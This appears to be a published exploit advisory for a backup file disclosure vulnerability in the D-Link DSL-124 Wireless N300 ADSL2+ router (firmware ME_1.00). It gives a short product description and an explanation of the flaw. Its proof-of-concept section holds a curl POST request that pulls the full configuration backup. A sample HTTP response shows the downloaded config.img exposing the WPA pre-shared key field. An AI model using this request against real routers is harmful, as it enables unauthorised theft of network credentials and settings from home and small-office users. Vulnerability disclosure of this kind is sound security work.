Authored by Aryan Chehreghani

DSL-124 Wireless N300 ADSL2+ suffers from a backup disclosure vulnerability.

# Exploit Title: DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure
# Date: 2022-11-10
# Exploit Author: Aryan Chehreghani
# Vendor Homepage:
# Software Link:
# Firmware Version: ME_1.00
# Tested on: Windows 11

# [ Details - DSL-124 ]:
#The DSL-124 Wireless N300 ADSL2+ Modem Router is a versatile, high-performance router for a home or small office,
#With integrated ADSL2/2+, supporting download speeds up to 24 Mbps, firewall protection,
#Quality of Service (QoS),802.11n wireless LAN, and four Ethernet switch ports,
#the Wireless N300 ADSL2+ Modem Router provides all the functions that a user needs to establish a secure and high-speed link to the Internet.

# [ Description ]:
#After the administrator enters and a new session is created, the attacker sends a request using the post method in her system,
#and in response to sending this request, she receives a complete backup of the router settings,
#In fact this happens because of the lack of management of users and sessions in the network.

# [ POC ]:

Request :

curl -d "submit.htm?saveconf.htm=Back+Settings" -X POST

Response :

HTTP/1.1 200 OK
Connection: close
Server: Virtual Web 0.9
Content-Type: application/octet-stream;
Content-Disposition: attachment;filename="config.img"
Pragma: no-cache
Cache-Control: no-cache

<V N="WLAN_WPA_PSK" V="[email protected]"/>
<V N="WLAN_ENABLE_1X" V="0x0"/>
<V N="WLAN_RS_IP" V=""/>